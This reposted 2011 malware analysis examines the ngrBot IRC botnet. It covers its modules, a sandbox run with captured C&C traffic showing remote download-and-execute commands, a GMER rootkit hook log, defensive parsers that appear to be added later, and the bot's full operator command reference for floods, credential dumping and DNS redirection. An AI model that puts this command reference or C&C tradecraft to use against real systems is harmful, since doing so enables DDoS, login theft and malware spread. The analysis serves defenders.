Analysis of ngrBot

8419 reads, 0 comments, 2011-09-09, a1234567mdy
Category: Network and Security


04 AUG 2011
Analysis of ngrBot
Written by Kimberly

stopmalvertising.com
Today we will have a closer look at ngrBot, an IRC bot with rootkit capabilities. The core of ngrBot is an advanced ring3 (usermode) system-wide injection and hooking engine similar to ZeuS and SpyEye.

NgrBot will inject code into almost every running process on the computer and is able to terminate processes. It will install to the user’s Application Data folder under a randomly generated filename using the HDD serial number as the initial key.

The bot is also able to block access to certain domains and to redirect domains / IPs to others.

It’s able to spread via USB devices and Windows Live Messenger. More recently ngrBot has been spotted on Facebook and also on Twitter, using the microblogging service to spread itself.


Modules and Features

Rootkit

The rootkit module will attempt to hide the bot’s registry startup key as well as the bot file.

Ruskill

The Ruskill module will, if enabled for a download command, monitor the downloaded file as it executes. Ruskill flags any file that the monitored executable copies itself to or creates for deletion at the next system reboot.

Proactive defense

The PDef module is an advanced threat detection and removal system. It monitors a range of file and networking APIs to detect and neutralize other threats running on the system. Currently this module can detect, block and remove malware that spreads via USB drives, browser exploit packs, and bots that use IRC to communicate.

DNS Modifier

This module can block domains from being accessed and redirect domains/IP addresses to others.

Slowloris

This module is for web servers running Apache HTTPd. It’s designed to use low bandwidth and to maintain connections as long as possible, thus consuming all available resources.

Syn Flood

The syn flood module is good for web servers that Slowloris fails to take down.

UDP Flood

This module is ideal for taking home connections offline.

Internet Explorer Login Grabber

This module hooks wininet.dll and analyses POST requests made by the IE web browser to capture usernames and passwords on the fly.

Firefox Login Grabber

This module hooks nspr4.dll and analyses POST requests made by the Firefox web browser to capture usernames and passwords on the fly.

FTP Login Grabber

This module hooks ws2_32!send to grab the FTP logins as they are used.

USB Spreader

Waits for USB devices to be inserted and then attempts to infect them using multiple .lnk methods and an obfuscated autorun.

MSN Spreader

This module hooks ws2_32!send to detect MSN messages being sent. It then monitors outgoing messages and waits for the spoofed number of messages to be sent before replacing one with the configured spread message. It has been tested with the msnp10 and msnp21 protocols with msnmsgr.exe, wlcomm.exe, pidgin.exe and msmsgs.exe.


Commands
  • Download
  • Update
  • Die
  • Remove
  • Mute
  • Version
  • Visit
  • Reconnect
  • Join Channel
  • Part Channel
  • Sort Channel by country
  • Unsort
  • Module toggle (enable/disable modules)
  • Statistics (Spreading/login grabbing)
  • Retrieve all cached logs
  • Syn
  • UDP
  • Slowloris
  • Stop DDoS
  • Set MSN Interval
  • Block/Redirect Domain and IP Address

The full package containing all the modules is sold for $400. NgrBot can also be bought à la carte: the bare bot without modules, with the buyer picking which modules to include.


Analysis of ngrBot

Upon execution facebook-pic0008422012.exe copies itself under a random name based on the HDD serial number (vgbkbf.exe in our analysis), using Kernel32.GetVolumeInformationW, to the C:\Documents and Settings\[username]\Application Data\ folder.


The newly created process vgbkbf.exe will attempt to inject code into the memory space of all running processes.


NgrBot initiates communication with its C&C at update.jebac.net over IRC. The domain api.wipmania.com is used to retrieve the country code for the victim’s IP. The HTTP / MSN spread message, followed by a link to the binary, is transmitted via IRC, and instructions are given to download a list of blocked domains from data.fuskbugg.se and a new binary called milkway.exe (saved as 1.tmp) from RapidShare. The bot reports back to the C&C whether the download was successful and whether the file was executed.

PASS ngrBot
NICK n{Country Code|XPu}[redacted]
USER [redacted] 0 0 :[redacted]
:001 get.lost
002 002 002
003 003 003
004 004 004
005 005 005
005 005 005
005 005 005
PING 422 MOTD
JOIN #!hot! ngrBot
:n{Country Code|XPu}[redacted]![redacted]@[redacted] JOIN :#!hot!
:get.lost 332 n{Country Code|XPu}[redacted] #!hot! :.http.int 5 .http.set is this you? HAHAHAH .msn.int 4 .msn.set LOL .mdns -n
:get.lost 333 n{Country Code|XPu}[redacted] #!hot! x 1312388577
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread message to "is this you? HAHAHAH "
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "4"
PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL "
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
PING :get.lost
PONG :get.lost
:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\1.tmp" - Download retries: 1
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

The file 1.tmp will request internet access in order to download a binary called memory.exe from RapidShare. The file will be saved under a random name in the %temp% folder.


Upon execution the file copies itself as windows.exe to the C:\Documents and Settings\[username]\Application Data\ folder.


Once windows.exe has started, ngrBot marks its presence on the infected system with mutexes named hex-Mutex and WeAreWeAre.


The Internet Explorer home page has been modified to redirecturls.info, which redirects to another domain.


Examples are:

NgrBot will periodically download milkway.exe and memory.exe from RapidShare in order to always run the latest version of the bot.

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Error creating process "C:\Documents and Settings\[UserName]\Application Data\2.tmp" [e="6"]
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\3.tmp" - Download retries: 1
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\5.tmp" - Download retries: 1
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\8.tmp" - Download retries: 0
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\9.tmp" - Download retries: 1
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\24.tmp" - Download retries: 1
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)

:x!x @ gov.ba PRIVMSG #!hot! :.dl -n
PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\25.tmp" - Download retries: 0
:get.lost 404 n{Country Code|XPu}[redacted] #!hot! :You must have a registered nick (+r) to talk on this channel (#!hot!)
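The two IRC excerpts above (the initial C&C session and the repeated .dl download commands) share one line format. The parser below is an added example, not code from the post or from the bot: it pulls the login fingerprint (PASS ngrBot, the n{country|XPu} nick, the #!hot! channel key), the dot-commands carried in the channel topic and the bot's status reports out of a captured session into a summary a responder can record. The sample session is constructed from the quoted lines, with the post's [redacted] placeholders kept.

```python
"""Parse a captured ngrBot IRC session into structured events and indicators.
Added example, not code from the post or the bot: line formats come from the two
IRC excerpts above; the sample session is constructed from them ([redacted] kept)."""
import re

# Login fingerprint: "PASS ngrBot", then "NICK n{<country>|<os tag>}<id>"
RE_PASS = re.compile(r"^PASS\s+(\S+)$")
RE_NICK = re.compile(r"^NICK\s+n\{([^|}]*)\|([^}]*)\}\S*$")
RE_JOIN = re.compile(r"^JOIN\s+(#\S+)(?:\s+(\S+))?$")                # channel + key
RE_TOPIC = re.compile(r"^:\S+\s+332\s+.*?\s+(#\S+)\s+:(.*)$")        # RPL_TOPIC = commands
RE_OPER_CMD = re.compile(r"^:(.+?)\s+PRIVMSG\s+(#\S+)\s+:(\..*)$")   # e.g. ".dl -n"
RE_STATUS = re.compile(r"^PRIVMSG\s+#\S+\s+:\[[A-Z]+\]:\s+(.*)$")    # bot reports back
RE_UPDATE = re.compile(r'^Updated (\w+) spread (interval|message) to "(.*)"$')
RE_DNS = re.compile(r"^Blocked (\d+) domain\(s\) - Redirected (\d+) domain\(s\)$")
RE_DL = re.compile(
    r'^PRIVMSG\s+#\S+\s+:\[d="[^"]*"\s+s="(\d+) bytes"\]\s+'
    r'(Executed file|Error creating process)\s+"([^"]+)"'
    r'(?:\s+-\s+Download retries:\s+(\d+))?(?:\s+\[e="(\d+)"\])?$'
)
RE_CMD_TOKEN = re.compile(r"^\.[a-z]+(?:\.[a-z]+)*$")   # .http.set, .mdns, .dl ...

def split_dot_commands(text):
    """Split ".http.int 5 .http.set is this you? .mdns -n" into (cmd, args) pairs:
    a .word[.word] token opens a command, later tokens up to the next one are its args."""
    cmds = []
    for tok in text.split():
        if RE_CMD_TOKEN.match(tok):
            cmds.append([tok, []])
        elif cmds:
            cmds[-1][1].append(tok)
    return [(c, " ".join(a)) for c, a in cmds]

def parse_session(lines):
    """Turn raw IRC lines into event dicts; lines that match nothing are dropped."""
    events = []
    for raw in lines:
        line = raw.strip()
        if m := RE_PASS.match(line):
            events.append({"type": "pass", "password": m.group(1)})
        elif m := RE_NICK.match(line):
            events.append({"type": "nick", "country": m.group(1), "os_tag": m.group(2)})
        elif m := RE_JOIN.match(line):
            events.append({"type": "join", "channel": m.group(1), "channel_key": m.group(2)})
        elif m := RE_TOPIC.match(line):
            events.append({"type": "topic", "commands": split_dot_commands(m.group(2))})
        elif m := RE_OPER_CMD.match(line):
            events.append({"type": "command", "operator": m.group(1),
                           "commands": split_dot_commands(m.group(3))})
        elif m := RE_DL.match(line):
            events.append({"type": "download", "size": int(m.group(1)),
                           "executed": m.group(2) == "Executed file", "path": m.group(3),
                           "retries": int(m.group(4)) if m.group(4) else None,
                           "error": int(m.group(5)) if m.group(5) else None})
        elif m := RE_STATUS.match(line):
            if u := RE_UPDATE.match(m.group(1)):
                events.append({"type": "spread", "module": u.group(1),
                               "field": u.group(2), "value": u.group(3)})
            elif d := RE_DNS.match(m.group(1)):
                events.append({"type": "dns", "blocked": int(d.group(1)),
                               "redirected": int(d.group(2))})
    return events

def summarize(events):
    """Collapse the event stream into the indicators a responder wants to record."""
    s = {"spread": {}, "topic_commands": [], "operator_commands": [],
         "downloads": [], "dns_blocked": None}
    for e in events:
        t = e["type"]
        if t in ("pass", "nick", "join"):
            s.update({k: v for k, v in e.items() if k != "type"})
        elif t == "topic":
            s["topic_commands"] = e["commands"]
        elif t == "command":
            s["operator_commands"].extend(e["commands"])
        elif t == "spread":
            s["spread"].setdefault(e["module"], {})[e["field"]] = e["value"]
        elif t == "dns":
            s["dns_blocked"] = e["blocked"]
        elif t == "download":
            s["downloads"].append(e)
    return s

# Constructed sample session, assembled from lines quoted in the post.
SAMPLE_SESSION = [
    "PASS ngrBot",
    "NICK n{Country Code|XPu}[redacted]",
    "JOIN #!hot! ngrBot",
    ":get.lost 332 n{Country Code|XPu}[redacted] #!hot! :.http.int 5 .http.set is this you? HAHAHAH .msn.int 4 .msn.set LOL .mdns -n",
    'PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "5"',
    'PRIVMSG #!hot! :[MSN]: Updated MSN spread message to "LOL "',
    "PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)",
    ":x!x @ gov.ba PRIVMSG #!hot! :.dl -n",
    r'PRIVMSG #!hot! :[d="" s="118784 bytes"] Executed file "C:\Documents and Settings\[UserName]\Application Data\1.tmp" - Download retries: 1',
    r'PRIVMSG #!hot! :[d="" s="118784 bytes"] Error creating process "C:\Documents and Settings\[UserName]\Application Data\2.tmp" [e="6"]',
]

if __name__ == "__main__":
    print(summarize(parse_session(SAMPLE_SESSION)))
```

Unknown lines (numeric replies, the 404 "registered nick" notices, PING/PONG) are ignored, so the same parser can be pointed at a longer capture.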


List of blocked domains


Gmer Scan

I left only 2 processes in the scan to reduce the size of the log.

---- User code sections - GMER 1.0.14 ----

.text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtEnumerateValueKey                                                          7C90D976 5 Bytes  JMP 00D323F0
.text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtQueryDirectoryFile                                                         7C90DF5E 5 Bytes  JMP 00D32690
.text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtResumeThread                                                               7C90E45F 5 Bytes  JMP 00D3D2AA
.text           C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!LdrLoadDll                                                                   7C9161CA 5 Bytes  JMP 00D3D166
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CreateFileA                                                               7C801A24 5 Bytes  JMP 00D311C0
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CreateFileW                                                               7C810976 5 Bytes  JMP 00D31400
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!MoveFileA                                                                 7C822294 5 Bytes  JMP 00D322F0
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CopyFileW                                                                 7C825779 5 Bytes  JMP 00D310A0
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!CopyFileA                                                                 7C830053 5 Bytes  JMP 00D31000
.text           C:\WINDOWS\Explorer.EXE[1212] kernel32.dll!MoveFileW                                                                 7C839659 5 Bytes  JMP 00D32350
.text           C:\WINDOWS\Explorer.EXE[1212] ADVAPI32.dll!RegCreateKeyExW                                                           77DD7535 5 Bytes  JMP 00D32D00
.text           C:\WINDOWS\Explorer.EXE[1212] ADVAPI32.dll!RegCreateKeyExA                                                           77DDEAF4 5 Bytes  JMP 00D32B60
.text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!HttpSendRequestW                                                           6301F73E 5 Bytes  JMP 00D31EA0
.text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!HttpSendRequestA                                                           6302E822 5 Bytes  JMP 00D31C40
.text           C:\WINDOWS\Explorer.EXE[1212] WININET.dll!InternetWriteFile                                                          6307665E 5 Bytes  JMP 00D32100
.text           C:\WINDOWS\Explorer.EXE[1212] WS2_32.dll!getaddrinfo                                                                 71AB2A6F 5 Bytes  JMP 00D31B60
.text           C:\WINDOWS\Explorer.EXE[1212] WS2_32.dll!send                                                                        71AB428A 5 Bytes  JMP 00D32E60
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtEnumerateValueKey                                  7C90D976 5 Bytes  JMP 001523F0
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtQueryDirectoryFile                                 7C90DF5E 5 Bytes  JMP 00152690
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtResumeThread                                       7C90E45F 5 Bytes  JMP 0015D2AA
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!LdrLoadDll                                           7C9161CA 5 Bytes  JMP 0015D166
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CreateFileA                                       7C801A24 5 Bytes  JMP 001511C0
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CreateFileW                                       7C810976 5 Bytes  JMP 00151400
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!MoveFileA                                         7C822294 5 Bytes  JMP 001522F0
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CopyFileW                                         7C825779 5 Bytes  JMP 001510A0
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!CopyFileA                                         7C830053 5 Bytes  JMP 00151000
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] kernel32.dll!MoveFileW                                         7C839659 5 Bytes  JMP 00152350
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ADVAPI32.dll!RegCreateKeyExW                                   77DD7535 5 Bytes  JMP 00152D00
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ADVAPI32.dll!RegCreateKeyExA                                   77DDEAF4 5 Bytes  JMP 00152B60
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!CallNextHookEx                                      77D4ED6E 5 Bytes  JMP 00EADD81 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!CreateWindowExW                                     77D51AD5 5 Bytes  JMP 00EB4832 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxParamW                                     77D56702 5 Bytes  JMP 00DD9315 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxParamA                                     77D588E1 5 Bytes  JMP 00FCDFBE C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxIndirectParamW                             77D62598 5 Bytes  JMP 00FCE021 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxIndirectA                                 77D6AEF1 5 Bytes  JMP 00FCDF51 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!SetWindowsHookExW                                   77D6E621 5 Bytes  JMP 00EADBCB C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!UnhookWindowsHookEx                                 77D6F29F 5 Bytes  JMP 00E11CA2 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxExW                                       77D80559 5 Bytes  JMP 00FCDE22 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxExA                                       77D8057D 5 Bytes  JMP 00FCDE84 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!DialogBoxIndirectParamA                             77D86CED 5 Bytes  JMP 00FCE084 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!MessageBoxIndirectW                                 77D960B7 5 Bytes  JMP 00FCDEE6 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] ole32.dll!CoCreateInstance                                     77526009 5 Bytes  JMP 00EB488E C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!HttpSendRequestW                                   6301F73E 5 Bytes  JMP 00151EA0
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!HttpSendRequestA                                   6302E822 5 Bytes  JMP 00151C40
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WININET.dll!InternetWriteFile                                  6307665E 5 Bytes  JMP 00152100
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WS2_32.dll!getaddrinfo                                         71AB2A6F 5 Bytes  JMP 00151B60
.text           C:\Program Files\Internet Explorer\iexplore.exe[1404] WS2_32.dll!send                                                71AB428A 5 Bytes  JMP 00152E60

---- User IAT/EAT - GMER 1.0.14 ----

IAT             C:\Program Files\Internet Explorer\iexplore.exe[1404] @ C:\WINDOWS\system32\ole32.dll [KERNEL32.dll!LoadLibraryExW]  [019718FD] C:\Program Files\Internet Explorer\xpshims.dll (Internet Explorer Compatibility Shims for XP/Microsoft Corporation)

---- Registry - GMER 1.0.14 ----

Reg             HKCU\Software\Microsoft\Windows\CurrentVersion\Run@Vgbkbf                                                            C:\Documents and Settings\[UserName]\Application Data\Vgbkbf.exe

---- Files - GMER 1.0.14 ----

File            C:\Documents and Settings\[UserName]\Application Data\Vgbkbf.exe                                                            169472 bytes

---- EOF - GMER 1.0.14 ----

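The GMER listing above carries a signal worth automating: for every inline hook GMER prints the JMP target and, only when that target lies inside a loaded module, the module's path. The IEFRAME.dll hooks in iexplore.exe are attributed; the ngrBot hooks in both processes are not, because they jump into injected memory that no module backs. The same injected image also produces the same relative layout of hook targets in every process it lands in (compare the Explorer.EXE targets 00D3xxxx with the iexplore.exe targets 0015xxxx). The script below is an added example, my code rather than anything from the original write-up or from GMER; it assumes the GMER 1.0.14 line layout shown in the log, and the sample lines it parses are constructed to mirror that layout.

```python
"""Triage of GMER 'User code sections' entries for unattributed inline hooks.

Added example, not code from the original write-up or from GMER. Assumes the
GMER 1.0.14 line layout seen in the log above: hooked export, address, patch
size, JMP target and, only when the target lies inside a loaded module, that
module's path. The sample lines below are constructed for illustration.
"""
import re
from collections import defaultdict

# Constructed sample in GMER 1.0.14 layout: two ngrBot-style hooks per process
# (no backing module) and one legitimate IEFRAME.dll hook.
SAMPLE_LOG = r"""
---- User code sections - GMER 1.0.14 ----

.text  C:\WINDOWS\Explorer.EXE[1212] ntdll.dll!NtQueryDirectoryFile  7C90DF5E 5 Bytes  JMP 00D32690
.text  C:\WINDOWS\Explorer.EXE[1212] WS2_32.dll!send  71AB428A 5 Bytes  JMP 00D32E60
.text  C:\Program Files\Internet Explorer\iexplore.exe[1404] ntdll.dll!NtQueryDirectoryFile  7C90DF5E 5 Bytes  JMP 00152690
.text  C:\Program Files\Internet Explorer\iexplore.exe[1404] USER32.dll!CallNextHookEx  77D4ED6E 5 Bytes  JMP 00EADD81 C:\WINDOWS\system32\IEFRAME.dll (Internet Explorer/Microsoft Corporation)
.text  C:\Program Files\Internet Explorer\iexplore.exe[1404] WS2_32.dll!send  71AB428A 5 Bytes  JMP 00152E60

---- User IAT/EAT - GMER 1.0.14 ----
"""

# One '.text' hook line: process[pid], module!export, address, size, JMP target,
# and an optional trailing module path when GMER could attribute the target.
HOOK_RE = re.compile(
    r"^\.text\s+(?P<proc>.+?\[(?P<pid>\d+)\])\s+"
    r"(?P<export>\S+!\S+)\s+"
    r"(?P<addr>[0-9A-Fa-f]{8})\s+(?P<size>\d+) Bytes\s+JMP\s+"
    r"(?P<target>[0-9A-Fa-f]{8})"
    r"(?:\s+(?P<module>\S.*?))?\s*$"
)


def parse_hooks(log_text):
    """Parse GMER '.text' hook lines into dicts; every other line is ignored."""
    hooks = []
    for line in log_text.splitlines():
        m = HOOK_RE.match(line.rstrip())
        if not m:
            continue
        hooks.append({
            "process": m.group("proc"),
            "pid": int(m.group("pid")),
            "export": m.group("export"),
            "target": int(m.group("target"), 16),
            "module": m.group("module"),  # None when no module backs the target
        })
    return hooks


def unattributed_hooks(hooks):
    """Map pid -> sorted exports whose JMP target GMER could not attribute."""
    out = defaultdict(list)
    for h in hooks:
        if h["module"] is None:
            out[h["pid"]].append(h["export"])
    return {pid: sorted(exports) for pid, exports in out.items()}


def payload_signature(hooks, pid):
    """Relative layout of the unattributed hook targets inside one process.

    Targets are rebased on the lowest one, so the same injected image mapped at
    different addresses in two processes yields the same signature.
    """
    targets = {h["export"]: h["target"] for h in hooks
               if h["pid"] == pid and h["module"] is None}
    if not targets:
        return ()
    base = min(targets.values())
    return tuple(sorted((exp, t - base) for exp, t in targets.items()))


def same_injected_payload(hooks, pid_a, pid_b):
    """True when both processes carry the same injected hook layout."""
    sig_a, sig_b = payload_signature(hooks, pid_a), payload_signature(hooks, pid_b)
    return bool(sig_a) and sig_a == sig_b


if __name__ == "__main__":
    hooks = parse_hooks(SAMPLE_LOG)
    for pid, exports in sorted(unattributed_hooks(hooks).items()):
        print(f"pid {pid}: {len(exports)} unattributed hook(s): {', '.join(exports)}")
    print("same payload in 1212 and 1404:", same_injected_payload(hooks, 1212, 1404))
```

On a full GMER log the unattributed set per process is the list of APIs the injected code intercepts; identical signatures across processes point at a single system-wide injector of the kind described above rather than per-process tampering.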
ngrBot Commands

Note: parameters within "[" and "]" are required, and parameters within "<" and ">" are optional.

!dl [url] <-r> <-n>

The bot downloads and executes a file from the specified URL.

Parameters
url        URL of the file to download and execute
md5        optional MD5 hash of the file to download for integrity check, the bot will not redownload a file with the same hash until reboot
-r        Enable RusKill on downloaded file
-n        Disables PDef+ on the system until reboot or until it is manually re-enabled

-------------------------

!up [url] [md5] <-r>

The bot updates its file, but the update does not take effect until the system is restarted.

Parameters
url        URL of the file to update to
md5        MD5 hash of the update file
-r        Reboot immediately

-------------------------

!die

The bot disconnects from the IRC server and does not reconnect until its system reboots.

-------------------------

!rm

The bot will remove itself from the system.

-------------------------

!m [state]

Enable/disable all output to IRC regarding commands and features.

Parameters
state    Enable (on) or disable (off) muting of all output to IRC

-------------------------

!v

The bot displays its version, customer name, the MD5 hash of its file, and its installed filepath.

-------------------------

!vs [url] [state]

The bot creates a browser instance and visits the specified link.

Parameters
url        URL to open
state    Open in a visible (1) or invisible (0) window

-------------------------

!rc <-n|-g>

The bot disconnects from the IRC server and waits 15 seconds before reconnecting.

Parameters
-n    Only reconnect if the bot is currently marked as "new"
-g    Only reconnect if the bot did not previously succeed in determining its country using GeoIP

-------------------------

!j [<[rule] [options]> channel]

The bot joins the specified channel. If rules are specified, the bot will only join if the rules apply to it.

Parameters
rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options        Options for selected rule
With -c,     you can put a single or multiple comma-separated country code(s)
With -v,     you can put a single or multiple comma-separated version(s)
channel        Channel to join
key            Key of channel to join

-------------------------

!p [<[rule] [options]> channel]

The bot parts the specified channel.

Parameters
rule        Optional rule for the bot to check for. Supported options are -c (country) and -v (version)
options        Options for selected rule
With -c,     you can put a single or multiple comma-separated country code(s)
With -v,     you can put a single or multiple comma-separated version(s)
channel        Channel to part

-------------------------

!s

The bot joins the channel for its country (e.g. Russian bots (RU) join #RU).

Parameters
rule    Optional rule for the bot to sort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

-------------------------

!us

The bot parts the channel for its country (e.g. Russian bots (RU) part #RU).

Parameters
rule    Optional rule for the bot to unsort by instead of country. Supported options are -o (operating system), -n (new/old), -u (admin/user), and -v (version)

-------------------------

!mod [module] [state]

Enable/disable modules that use hooks.
Note: disabling bdns will only unblock AV and other preset sites, not sites set using the !mdns command.

Parameters
module        Module to change. Supported modules: msn, msnu, pdef, iegrab, ffgrab, ftpgrab, bdns, usbi
state        Enable (on) or disable (off) module

-------------------------

!stats <-l|-s>

Retrieves statistics for spreading and/or login grabbing. If no parameters are specified, it will display both.

Parameters
-l    Display login grabber stats
-s    Display spreading stats

-------------------------

!logins

Retrieves all grabbed and cached logins and prints them to channel or PM. Can also be used to clear login cache.

Parameters
site    Site to retrieve logins for (case insensitive, see here for the list of sites)
-c        Clear login cache

-------------------------

!stop

The bot will end all running flood tasks.

-------------------------

!ssyn [host] [port] [seconds]

Parameters
host        Host to flood with SYN requests
port        Port to flood. If 0, the bot uses a random port
seconds        Number of seconds to flood the target

-------------------------

!udp [host] [port] [seconds]

Parameters
host        Host to flood with UDP packets
port        Port to flood. If 0, the bot uses a random port
seconds        Number of seconds to flood the target

-------------------------

!slow [host] [minutes]

Parameters
host        Host to flood using slowloris
minutes        Number of minutes to flood the target

-------------------------

!msn.int [interval]

Set the number of MSN messages in a conversation before one is replaced with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.

Parameters
interval    Number of MSN messages before spread

-------------------------

!msn.set [message]

Set the message that will be used for MSN spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.

Parameters
message        Message to spread via MSN

-------------------------

!http.int [interval]

Set the number of Facebook messages in a conversation before one is replaced with your spreading message. See here for more information.
Note: use '#' for a random interval between 1 and 9.

Parameters
interval    Number of Facebook messages before spread

-------------------------

!http.set [message]

Set the message that will be used for Facebook spreading. See here for more information.
Note: use '#' for a random digit and '*' for a random lowercase letter.

Parameters
message        Message to spread via Facebook

-------------------------

!mdns [url|[domain1 <domain2|ip2>]|[ip1 <ip2>]]

The bot will block access to or redirect the specified domain/IP address.
Note: domain to domain, domain to IP address, and IP address to IP address redirects work. IP address to domain redirection does not yet work.
Note: it must be the exact domain, for example "example.com" will not include "". Wildcard support will be added in an update.

Parameters
url            Plaintext file with one redirect/blocking rule per line, rules are formatted in the same way as the command parameters.
domain1        Requests for this domain will be redirected to domain2 or ip2 if they are set, otherwise it is blocked
ip1            Requests for this IP address will be redirected to ip2 if it is set, otherwise it is blocked
domain2        DNS queries for domain1 will be redirected to this domain if set
ip2            DNS queries for ip1 or domain1 will be redirected to this IP address if set
